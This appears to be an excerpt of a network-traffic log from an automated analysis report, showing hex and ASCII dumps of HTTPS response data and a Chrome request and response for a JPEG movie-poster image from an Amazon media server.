                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 9d 39 64 8f 45 45 20 15 89 21 76 d9 ad ba 19 5b 14 3f 88 bf 46 2d 16 47 40 f5 6f a4 c0 78 e2 7b 38 42 c3 0d 68 1f 7c e6 ac ad 9e 4b 38 50 2e a1 1f 25 e6 1a 49 76 5a e7 55 b9 59 80 c5 0f e2 0f a0 69 70 56 28 a8 5c c5 b9 27 11 bb 47 1c 26 ad 9a 3b 02 4d 49 7e 87 73 89 17 50 e2 2d 4c 77 79 3d 07 c0 91 b4 87 0b 1e 8d 70 cc 8a 6e a0 48 48 09 f5 47 c4 3d 5e 02 69 73 b0 c9 ed 6d e3 fc 86 f1 1f ec 79 af 38 39 85 8d aa dd 73 49 34 10 5a b7 33 45 71 95 85 d4 5d 01 89 c2 f5 45 2c 70 bd 84 c0 39 2d a3 18 99 c4 92 d8 5b d9 f0 bd 5e a3 5b 98 2d 20 86 70 f7 bc 49 a8 ab 87 5d ff 00 46 18 1e 73 b6 38 f4 09 bd e4 be d1 8d b4 7c ab 43 a0 f3 ec 9a 65 c3 f9 ae d6 08 ff 00 2f 3d b4 7f 8c 0b f7 0e 12 2d 31 24 92 21 71 15 8c 32 f7 89 14 eb c6 b3 0a 92 d4 f0 3c 15 a4 4a 9c 77 51
                                                                                                                                                                                          Data Ascii: 9dEE !v[?F-G@ox{8Bh|K8P.%IvZUYipV(\'G&;MI~sP-Lwy=pnHHG=^ismy89sI4Z3Eq]E,p9-[^[- pI]Fs8|Ce/=-1$!q2<JwQ
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 94 c9 8f 5a 7f f1 68 3e 7a 67 59 fc 49 43 60 f3 56 ba 92 46 30 66 d5 d3 fb 65 91 a5 62 cd 8a c5 62 b1 58 ac 56 2b 15 8a 02 b1 58 ac 56 2b 15 8a c5 48 df da 36 65 46 66 c4 6b 1a d6 f7 97 de 77 ca 2a 89 66 c0 0b 50 ce 80 6d 09 89 e3 c1 b2 77 56 30 3e ce 33 b2 b1 d1 25 75 f4 a8 01 7e e6 9c 1a 82 ef 89 b3 57 57 ad 72 00 3f 06 3a e2 b1 58 ac 50 42 c7 0b ff 00 34 28 8a c5 62 b1 d3 1d 16 5e 15 1b a1 b8 f4 3b 54 72 34 de b6 13 e0 a6 c8 71 26 77 5c c2 43 b1 a8 98 a3 64 35 e4 c8 3c e4 dc c1 97 ba 07 6c 46 bb f8 ab bf 8b eb b3 e0 66 94 b9 f3 50 8e 1d db 8e 65 57 01 10 a1 c5 21 6c 9a 1e 7e 0c 53 ba af 86 5b 66 9a 10 b2 ea 0a 61 8c 25 73 e2 26 5a 07 68 5c 36 f1 eb 5b 8d 8d e4 56 ff 00 18 ae 68 b6 1c 47 19 da 52 a4 88 ee c5 76 d2 fd 1c 7c 2c 45 5b e1 5d a4 a8 25 64 dd
                                                                                                                                                                                          Data Ascii: Zh>zgYIC`VF0febbXV+XV+H6eFfkw*fPmwV0>3%u~WWr?:XPB4(b^;Tr4q&w\Cd5<lFfPeW!l~S[fa%s&Zh\6[VhGRv|,E[]%d
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: a3 32 93 83 b7 28 e8 57 e7 9b bd aa e2 52 64 a8 2e c6 fd b5 05 96 4f 8e cd 60 45 69 56 5e 63 98 a7 8e 39 88 54 d8 f6 2c b2 3a 32 b2 fa 0e e9 7d 35 3c 6d 1b 15 65 66 cf a6 ea 16 5e 19 2a 6e 65 fb 16 e4 37 8a 6b e8 d0 9c f7 b1 63 35 dd 3c e7 10 cd 08 8a df 6d 38 dc cd 14 a4 15 f7 32 b3 0f 3f ac d5 8d a8 8f 2d 57 1b a4 98 46 b7 b0 72 45 b4 5b aa 2a 2f 1d 5c ed 3e 6b 3c 11 ee 10 c9 35 ce ed 8b 62 0f 99 52 25 8f ed cd 67 a3 ca 92 b5 38 11 b6 d5 dd d9 ba 4c b9 e5 b8 3c 1f 2e 09 10 a6 9d 7a ab 94 79 2d e3 9b cb 6d e2 67 47 b2 b4 d9 eb 6b b1 98 64 14 b7 8c b1 a1 af ea 0c 5b 12 dd db 19 3e 6d 59 d9 a3 0d d2 de dc 05 4e 33 57 36 e2 75 c1 9e dd e1 38 6b 1b 56 7f 34 06 3d b5 4f c0 f4 48 9f 8e 57 92 11 28 da d2 44 c5 88 ab 7b 1e dc 72 b2 26 c5 0b 42 3c 3b 3d 4b 18 91
                                                                                                                                                                                          Data Ascii: 2(WRd.O`EiV^c9T,:2}5<mef^*ne7kc5<m82?-WFrE[*/\>k<5bR%g8L<.zy-mgGkd[>mYN3W6u8kV4=OHW(D{r&B<;=K
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: de 2b 84 8c 66 48 55 51 8d 3f 8f 67 75 c1 15 c8 17 ed 05 f1 e1 60 2d 90 56 dc 54 c0 0c 61 5d 54 ae 4c be 18 56 f7 34 47 f9 1f f1 b1 85 2a 79 a7 00 1e 8b f5 51 c0 5a 13 6d f6 2e c7 e0 84 81 9c 97 50 72 1a 66 6f 14 4e 69 00 fd a6 17 c8 27 04 e4 4b 82 c6 b9 1c d1 f3 ef 90 2b 92 97 d4 7c cb 10 8c 50 23 6e 07 28 1e dc c6 b7 93 9e 8b fc 85 19 15 e9 14 5e 8b 13 f0 2b 6d f3 45 c9 a7 6c 02 68 c8 79 08 a5 90 50 60 7c 74 5f f6 02 71 e6 98 96 f0 bd b6 d3 ba 90 0a 40 7f 74 bf ec 3b 0f ed 63 55 f6 ea 9f ec d1 fc 59 ac f4 cd 66 b3 59 f8 b3 d7 35 9f e0 45 ed 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 8c 55 d8 c5 5d 8c 55 d8 c5 5d 8c 55 d8 c5 5d 8c 55 d8 c5 5d 8c
                                                                                                                                                                                          Data Ascii: +fHUQ?gu`-VTa]TLV4G*yQZm.PrfoNi'K+|P#n(^+mElhyP`|t_q@t;cUYfY5E]UE]UE]UE]UE]UE]UE]UE]UE]UE]UE]U]U]U]U]
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 47 41 55 c9 a5 47 f1 1f a6 3a 4c 7a b1 54 e5 f3 51 2e ba 52 dd 5b de 28 db 8a 23 d3 b6 7c 58 8f a5 fe 3d 36 8a 34 25 c2 25 d4 69 ae 09 f5 91 52 5b 7e 74 c9 6a 39 3d d2 cf 6d d5 8d 32 8a 28 8e 9e d4 56 65 1b 46 c7 e6 a2 db a5 1e 9d 25 ca 8d 2a 52 8a 92 a2 5d 3b 4a d5 11 8a 6e 9a 58 b2 c6 2b 2b 34 6d 14 19 a7 06 a5 78 4b 16 38 53 a1 46 b9 23 2e 31 74 58 f1 45 14 51 14 af 95 24 88 bb 1f 84 a2 b7 0b 4c ac 32 b0 db 4c a1 68 b6 28 24 52 63 d0 5f 6b b6 84 91 fb 2c bc 35 72 bf 0b 2b 1b 84 bf 47 d7 8d e1 61 0e 2e c4 9e 78 c3 45 09 73 9b cd 66 84 51 58 b2 b0 de 36 d1 45 79 21 f9 58 b3 76 21 ac d9 58 b1 fa 5e 5e 68 bc 5e 2c b2 cb 2c bc 59 78 b2 f3 7e 35 9b f6 57 fb 75 ff 00 2e fd 35 8b 2f dd 65 97 ed bf 7d fa 9a f0 ac a5 e8 b2 f2 cb f0 bf 65 61 f8 58 fc af 16 59 6f
                                                                                                                                                                                          Data Ascii: GAUG:LzTQ.R[(#|X=64%%iR[~tj9=m2(VeF%*R];JnX++4mxK8SF#.1tXEQ$L2Lh($Rc_k,5r+Ga.xEsfQX6Ey!Xv!X^^h^,,Yx~5Wu.5/e}eaXYo
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 76 d4 a2 c8 30 01 a5 18 72 99 4f 64 a1 56 58 1f 08 a9 45 cf d9 a2 3c 10 b2 d1 46 fa e2 3b 04 54 32 63 f3 ba 0b 2a 5f a9 8d f1 2b 20 36 bf 4f e8 9f 01 83 74 47 2f 59 b0 71 c6 49 e0 c4 d0 27 c7 f2 b1 a5 e7 c0 23 20 22 5c 1b 33 be 88 c0 46 af 33 e0 9c 3a 46 02 cd b2 7e 15 6e 97 b4 72 6d db 53 c3 65 d6 9b 8a 95 aa 9b 30 10 d5 8a b7 67 59 f4 0d fe e5 d8 ed 4a 97 63 bd 06 d6 ae 7c 07 ca 26 54 21 0f fb 56 59 fd c4 ab 3a 31 89 70 80 e0 ac cc 42 53 33 d6 9f f2 30 03 f3 94 1d 2b 84 27 be a9 96 7f 31 d2 77 ae 22 75 4d 00 c1 8b cd 9f aa cb 5a d4 c6 f8 95 90 1b 5e 6d f2 a2 7c 06 0d d0 ee f5 98 43 71 32 59 40 2d 75 44 ca 75 2e 0d 2e 25 5a 13 bd ba 5e 41 60 e0 6d 4f 58 5d be cc b8 28 ec 2e 19 16 70 aa 8c 4b 6f 3e 02 4a d3 ff 00 68 52 65 ae d5 91 c5 59 ba 8f 3c dd 7a b2
                                                                                                                                                                                          Data Ascii: v0rOdVXE<F;T2c*_+ 6OtG/YqI'# "\3F3:F~nrmSe0gYJc|&T!VY:1pBS30+'1w"uMZ^m|Cq2Y@-uDu..%Z^A`mOX](.pKo>JhReY<z
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: c9 da 8f c4 56 4d 9c 3e 88 c2 17 b7 49 be 30 d8 b4 9b da 6d 11 42 3c 49 59 2f 9a 48 0d c3 cd 4a 50 b7 d6 3e 4b 52 10 8f 5b e8 9b 31 7a 8f 48 d5 44 e9 43 6c 66 a2 23 ae 14 4f 89 6c da 56 e7 8e af df 64 ee 28 4c 5e b4 8e a1 14 28 86 63 31 45 d6 82 c9 e8 cb 44 a3 07 1a 01 f7 e2 9e 37 4d 57 ee 51 b9 4a c9 11 d9 55 7d 36 2a 7f 51 fa 7a a2 42 fe 90 5b 1a 23 5d 68 47 51 5f d1 08 72 4e 8f e6 12 3e 6b 4b 03 54 70 8c 3e e4 8c 8e 06 cc 0f d5 13 1d 51 29 d6 76 cd dc 17 17 18 72 54 5d 9c c2 79 af 42 ab 05 30 6a dc 54 21 6e 27 61 44 88 dd 27 8f 35 fd a8 15 5e 59 84 2f 6e 66 fc 55 cc 65 e4 84 00 bd 5d 66 58 dc 9b 26 56 fd bc 50 03 57 4b be 05 30 7c a7 c8 a3 00 13 ca 71 31 dc aa 27 1d ba b3 65 39 27 47 69 fb 82 3b 47 44 a9 13 f7 cf 92 12 fd b3 ee 57 8a de 61 9e 16 70 37
                                                                                                                                                                                          Data Ascii: VM>I0mB<IY/HJP>KR[1zHDClf#OlVd(L^(c1ED7MWQJU}6*QzB[#]hGQ_rN>kKTp>Q)vrT]yB0jT!n'aD'5^Y/nfUe]fX&VPWK0|q1'e9'Gi;GDWap7
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 9f 7f b7 92 37 a1 e3 ea 79 66 ea b6 38 a1 b7 b9 7f ed f7 94 2e bf 12 d0 9d 7e d5 39 de a5 1f 63 77 b4 28 23 d6 0b 04 14 b9 7a c7 a4 02 11 e5 af 35 0f 9c 15 c1 1d f8 f4 76 e2 81 30 7d 4e c3 dd ee 3a fd 41 9a ff 00 f2 bb 43 31 bb 6e 7f 2c fa a0 29 58 d6 b8 29 48 9e 4a 37 f7 f9 22 04 06 db e2 a7 c9 00 3d b1 fb a6 6b 96 a4 2f 3c d5 f9 a7 fe 56 08 c1 7d ca 08 2f 35 f7 28 fa d1 34 d5 44 3d c2 f3 e1 15 87 96 7f 3d 4b 15 8a b8 e6 fb 8a e6 be ea 84 a4 b0 1d ea e6 fa 83 c7 db ea aa f2 47 82 1c 73 9d cb eb 42 bb 39 86 62 a7 55 ad 4f 45 05 e4 11 cd 2f 70 ec e6 d5 9b 04 17 dd 16 bd 99 bc a9 98 78 ad 7d eb 5e bc e6 99 b0 2b 57 9a 0a 5e e3 80 e6 bc f1 5d a5 54 33 62 ae 5f 99 6b 95 50 c3 35 c4 73 cd ad 1e a2 bf 72 92 28 2d 15 31 c1 70 f6 fa f3 1f 54 71 f5 30 2b 1f 24 2b
                                                                                                                                                                                          Data Ascii: 7yf8.~9cw(#z5v0}N:AC1n,)X)HJ7"=k/<V}/5(4D==KGsB9bUOE/px}^+W^]T3b_kP5sr(-1pTq0+$+


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          97192.168.2.1649831151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC676OUTGET /images/M/MV5BMDNlNDIyNGQtNWUwYy00MjZlLThmMmItZjEwMjEyM2E5OGQ5XkEyXkFqcGdeQXVyODk1MjAxNzQ@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:12 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 26137
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: fdb9a9bd-415c-4800-9f03-e60cb635bffb
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 16 May 2020 16:45:17 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 10 Nov 2044 08:45:46 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1651541
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000037-IAD, cache-ewr-kewr1740075-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 90 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 00 02 08 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 45 9f 99 ee 3e 6b a6 6f 62 af 45 7a
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6E>kobEz
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 78 a6 48 98 e4 81 09 61 94 21 5d 7c 78 c4 f8 f3 b0 23 8e b8 b4 2b e8 fd 57 45 c5 1d 17 6d 52 0e 32 5b 7b 85 fb 4e f6 4f f9 2a da 3d 9b b4 7d 97 34 b4 4a 82 92 05 fc d1 9c 9f 72 3d 89 87 80 16 0a a3 7c 69 62 f4 8b b4 5d 4b 53 5e 5c ea 81 e8 49 ce 73 39 6e eb 2f 6a f9 bc 2b 1a 12 0e 0c ae db f0 63 1d a8 9f 60 d4 c9 53 07 b5 d5 a4 1c e9 af 6a 43 4c d7 4a 5d dc c2 6b 6d b0 1c 71 9f 71 15 21 54 da 41 0e 5a 36 4c 3c e0 f4 95 61 24 c0 6a 2b 55 b4 2d 3a 66 fe c9 60 a0 e7 17 c5 83 87 32 6c e0 0a d0 92 27 52 5a 2c dd 33 a9 67 d0 0b ad 84 71 cd 5b e6 7d 48 81 e4 47 39 f5 e9 7c f2 3d 24 c9 3e 50 8d 06 d5 43 16 d3 35 64 77 cd 47 66 c1 b3 c1 ba ad 5b 3b 4b 8e fa ed a6 46 71 df 57 49 4c c3 86 a9 cf ab ce 9f 38 c2 51 2f 43 a6 e1 09 85 05 63 ca 4c b6 c9 36 90 77 e6 cc 6f
                                                                                                                                                                                          Data Ascii: xHa!]|x#+WEmR2[{NO*=}4Jr=|ib]KS^\Is9n/j+c`SjCLJ]kmqq!TAZ6L<a$j+U-:f`2l'RZ,3gq[}HG9|=$>PC5dwGf[;KFqWIL8Q/CcL6wo
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 02 e5 0f 71 2a 79 e4 96 b4 3d ab c5 b2 c1 c9 59 4a 9d 1e f4 63 b5 e7 4b fe 20 6a 64 e3 35 07 de 01 2b ae 1c 06 d4 f1 e9 48 26 a6 0b ca 08 b6 20 48 c8 db 87 0a d0 bc bf 7b 1b 03 ca 03 30 c1 a1 60 4a f5 c6 7a 6a a5 9d 37 7f 8e 26 0f be ed f4 f5 4f 8f 8b 71 52 ef cb 2f 17 c2 7d a6 36 21 c8 dc a6 95 a4 69 36 67 bc cc c3 e0 76 95 a9 62 00 aa 95 a8 6a 6e 72 31 bd fd 8b 74 c6 25 b5 8f 84 b4 9d 9e 50 99 91 83 a6 d5 77 e1 35 4a 1b b0 1b 98 fd 3f 67 ef bf a7 a7 0f d3 fa f0 3f 89 66 a6 a6 a6 a6 a6 a6 a6 a5 95 87 05 4e 3e 15 6b ee 75 fe f5 35 35 0a c4 a9 43 18 16 6a 6a 6a 6a 6a 6a 6a 70 f7 dc 2b 2d c0 6d fd 98 d8 0d 5b 6d c2 c2 b3 3b 14 28 e6 3b ad 44 ce 3a 88 9c 8e a6 12 f0 4e 3d ac b5 2b fc fd 7d 12 ac aa ee d8 49 93 94 98 cb c9 e9 ea d5 da c1 7b 18 b5 85 24 f6 ba
                                                                                                                                                                                          Data Ascii: q*y=YJcK jd5+H& H{0`Jzj7&OqR/}6!i6gvbjnr1t%Pw5J?g?fN>ku55Cjjjjjjjp+-m[m;(;D:N=+}I{$
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 7c ba 1e fd 2a 9e 05 8f ed eb 73 ae d9 6d 1c 14 63 57 69 56 bd 70 3a 85 b9 dc 83 eb f6 85 73 84 30 c1 33 7f 85 a6 2d ea 2d 49 93 9d 5a b3 01 66 62 98 f7 2b 43 db 19 09 3b 14 d2 29 40 80 0d c3 5f ec b5 ef 5f f1 f5 da b2 78 d6 d7 60 e5 65 d1 47 31 57 2b ee 1e 26 4d 7e ca 0e ed df 37 f8 2d 8e fe ed 1e cf 69 6b 43 01 d4 af ef 20 4e 97 8f ef e4 ec 3d a1 7e c0 4f 1c d7 d3 91 d4 4e 31 99 dd 56 fc b0 55 b1 ff 00 e4 3f 6e ae 6c 3f 5a 79 51 d2 9b 23 ee 07 f6 17 db b9 97 f5 5f 15 c6 b9 fe 73 4d ef 66 4d 79 38 f7 78 ec 6f 73 09 fb 44 63 df 13 1c db 2b a8 54 aa 8b f4 09 b9 af a3 43 df 9e 5d f8 99 68 b8 d4 bd f8 78 78 de 9d db dd 8e ab 4c bc 14 f2 4c 9c 3c 8a 77 92 30 ef 6b eb 0e df b7 d6 b1 b8 5b e5 98 9d 3e cc af c5 3a 0d 60 4c ae 97 66 33 f2 3d 4b 3a 9b d5 05 64 f6
                                                                                                                                                                                          Data Ascii: |*smcWiVp:s03--IZfb+C;)@__x`eG1W+&M~7-ikC N=~ON1VU?nl?ZyQ#_sMfMy8xosDc+TC]hxxLL<w0k[>:`Lf3=K:d
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: c4 ea 2b bb 3d b7 a9 6b 1b 57 53 30 10 6b 65 c4 c9 4b d7 60 ae e1 a1 53 e3 a7 0d 23 7d 46 18 65 af 30 1b 7c fb 34 bb fe d3 0d 7f 46 a9 c2 70 9c 27 09 c2 71 fa f3 5d 6b a9 99 9a e4 3c 1c 33 ab a6 8f af 02 33 97 6d ca bd d6 23 70 3c 4b af 90 41 87 92 8f b4 c5 16 01 fa ac d2 84 e0 8a 3e 8c be a9 4e 37 da 5f fe 40 e7 f0 c5 ea 76 df ed 06 79 4f e6 7b 3d bd ad 73 b0 ab 89 4f 85 02 f6 79 92 da 5b 0c a1 78 a2 0f d9 dc dc dc 2d 3a cd 9b f1 88 f5 35 41 4c ad 87 f7 7e ea f6 34 0d fb 9e 7e 23 a3 69 0c 27 a9 f1 c1 9d 3d 6f b6 e5 7b 7f 72 97 ba b7 d9 96 6f c6 1c e7 af cc ca fc 3f c8 e5 9d d7 16 95 4f 9f 2d 47 d8 6b ef 5d 53 4f 24 06 5d 41 c7 db 26 26 20 4f bb bd a6 64 7d c3 8c df d7 b9 b3 0e e0 e5 34 61 06 75 4b 08 b0 03 4d bc 23 b2 7c aa ff 00 fb 64 bf 8f c9 60 ff 00
                                                                                                                                                                                          Data Ascii: +=kWS0keK`S#}Fe0|4Fp'q]k<33m#p<KA>N7_@vyO{=sOy[x-:5AL~4~#i'=o{ro?O-Gk]SO$]A&& Od}4auKM#|d`
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 25 4e 89 eb 79 26 ae d1 e7 3a 7f 74 50 3b b0 e3 f6 98 b0 ce 62 6b 1b ae e3 5b 87 56 ea 76 dc 8c 8f 45 c2 ab 56 c3 95 9c d9 36 72 2d 53 21 e2 dd 2f 09 08 37 37 55 09 d8 58 95 33 b0 45 6a 9e a6 e2 f4 f5 7b aa 33 a8 5e 96 9a 9d 3a 57 fc e6 75 3e 99 ff 00 a2 be 53 a7 f4 be eb 77 1c 78 1a f4 b1 77 3a 82 6a a1 31 a9 5b 2e 44 6c 9e 97 8f 56 3b b2 04 2c da 0a cd 53 ee 64 64 1b db ba 71 3a c3 63 29 59 93 d4 5f 21 b9 3d 4a d5 a7 7e 37 5d 67 af 85 9f 73 22 b2 8b 52 b7 4a 3f ce 66 4b 0f d7 b6 7d cc 70 ab 4a 01 ca 72 9d d9 7e 38 bd 38 1a ba 65 55 58 18 65 5e a2 92 19 0d 4a e1 86 46 5e 3d ca 0c 19 b4 ad 62 a0 d5 d5 ff 00 4a 92 8e 63 b9 91 91 8c c0 57 1a aa 37 ed a1 b1 91 81 7c ac 5a ec fe 63 8d 95 45 2f ca 3f 5b 47 0c 8c bd 22 ab 14 3a 21 e2 a1 67 76 77 67 39 ce 7e b9
                                                                                                                                                                                          Data Ascii: %Ny&:tP;bk[VvEV6r-S!/77UX3Ej{3^:Wu>Swxw:j1[.DlV;,Sddq:c)Y_!=J~7]gs"RJ?fK}pJr~88eUXe^JF^=bJcW7|ZcE/?[G":!gvwg9~
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 7d 1f 8a 01 e5 6f 84 ca a8 be f7 2b f4 de 5d 95 1b 66 ff 00 0c 19 40 63 e0 ea 76 bd dc f5 28 1f 23 ac 9d 02 a8 a3 6d 5d b4 da 37 5d 9e 3e 97 b0 58 e2 b0 06 d9 6c ae cf e0 d8 e0 90 65 b7 d5 8f 59 b2 da 7c ce 1d e7 8d 61 50 fd 5b 7d 34 2f 2b 42 2b af 25 1e 9e c4 16 f7 0e 90 04 f2 66 93 94 7a 62 e6 7b 8a d5 1b c6 d6 12 d2 16 fc 61 75 66 b6 4f 07 46 3d b5 d9 5e 5e 33 5f 8e f5 2e 07 8a 4c 2a b8 04 bd 2d 1c 93 cd f9 3b 03 ae 3a 78 36 b3 dd b6 ac c8 4a 90 d8 eb 75 59 08 19 32 7d 3d 8f 78 dc f0 f8 f6 52 2f ae cf 3b ff 00 19 67 86 f3 7a 3e d2 de 03 ee 79 6f 38 28 4e 9a cf cf c9 94 12 bf 07 c6 59 bb f5 33 72 5e 9c 6b 1e bc 4f 35 99 7e 55 49 69 b1 51 39 33 aa 5f 51 03 0b 08 62 a7 40 cf f4 ea e6 3a d8 30 bc 35 78 69 a4 c8 b1 2e b0 63 45 f4 b0 ae ee ca 7e 97 e7 0e d0
                                                                                                                                                                                          Data Ascii: }o+]f@cv(#m]7]>XleY|aP[}4/+B+%fzb{aufOF=^^3_.L*-;:x6JuY2}=xR/;gz>yo8(NY3r^kO5~UIiQ93_Qb@:05xi.cE~
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 14 37 c4 e7 1e e0 18 88 72 04 39 13 ff c4 00 3e 10 00 01 02 03 04 06 09 03 02 05 04 03 01 00 00 00 01 00 02 11 21 31 10 41 51 61 12 20 22 71 81 91 03 30 32 42 52 a1 b1 c1 d1 40 e1 f0 62 f1 13 43 82 92 a2 23 33 50 72 53 63 b2 c2 ff da 00 08 01 01 00 09 3f 02 ea 9b 10 ab a9 cd 3e 7b a4 a9 8e ab 0f 24 25 8d ad 3c 93 7e 79 75 ce 80 f3 4d f5 29 b2 dc 9a 8f 34 dd c1 74 62 c1 c6 2a 86 c3 00 2f 43 ef 68 97 a6 a8 47 72 da c3 2b 70 a4 7d 17 1c ad e4 aa 3a 8c fa 9b d6 d1 c3 31 ac 36 b1 ea e7 ed f6 57 53 3f da df b6 bd c4 d8 e0 37 98 2e 91 bc d3 81 85 9f 28 11 1c 6d be c3 00 9d cc 40 6a b6 97 9f 64 d6 9f 2f 95 b0 73 a7 35 d2 08 9c ed e8 e3 a3 9c 17 ed ad d8 6f 9e 7a f8 9b 21 06 c6 a8 85 e1 16 62 57 64 6a 50 2a e1 85 9d d3 aa de 52 53 1e 6b c4 2d f1 2e c9 af ce af f5
                                                                                                                                                                                          Data Ascii: 7r9>!1AQa "q02BR@bC#3PrSc?>{$%<~yuM)4tb*/ChGr+p}:16WS?7.(m@jd/s5oz!bWdjP*RSk-.
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: 8f 1c 84 f2 5a 51 04 52 0c 6c a7 17 4a 78 cd 1d 33 be 4a 43 53 bc 1a 7d 8d 98 15 56 d9 77 9a 9b 9d f9 1e 0a 2e 22 9a 46 30 f6 b2 e6 95 70 1a a3 ae 30 4d 72 97 ea 70 98 dd bd 08 05 5e 7c 85 49 4d 9e 2f 74 3c a7 0f 24 e6 f0 36 f6 74 42 e8 9c 59 e2 97 a5 51 88 15 e2 bb 2e aa 98 28 45 34 0b 7b c6 27 73 7e 6c 92 28 f5 ff 00 ba 9e 77 28 2a 63 8e e0 b6 7d 54 c7 84 a6 8e 49 a3 95 b7 48 fb 59 fe df 4a 60 47 a1 4e e0 57 4b c0 6a 50 2e d1 a8 f0 e0 3f 2b 65 3b 9f 3c 7d 37 95 7d a3 a9 11 cb 52 8d f7 b0 48 f6 5b e2 de a6 ef 4d cb b4 e5 72 32 77 b6 a7 7e bb 90 89 37 26 c0 b6 1c 2f 4d 1a 2d ba fe 0b 69 74 6d 86 64 fc 21 07 36 ad af 23 7a e4 ae a0 b9 bf 7c d5 45 47 88 61 f0 bb 24 4c e4 6e e3 f9 72 34 46 d3 25 27 7b 7d ba 8c d0 d2 02 98 ae 8c f3 82 67 29 ae f3 ac e1 92 99
                                                                                                                                                                                          Data Ascii: ZQRlJx3JCS}Vw."F0p0Mrp^|IM/t<$6tBYQ.(E4{'s~l(w(*c}TIHYJ`GNWKjP.?+e;<}7}RH[Mr2w~7&/M-itmd!6#z|EGa$Lnr4F%'{}g)
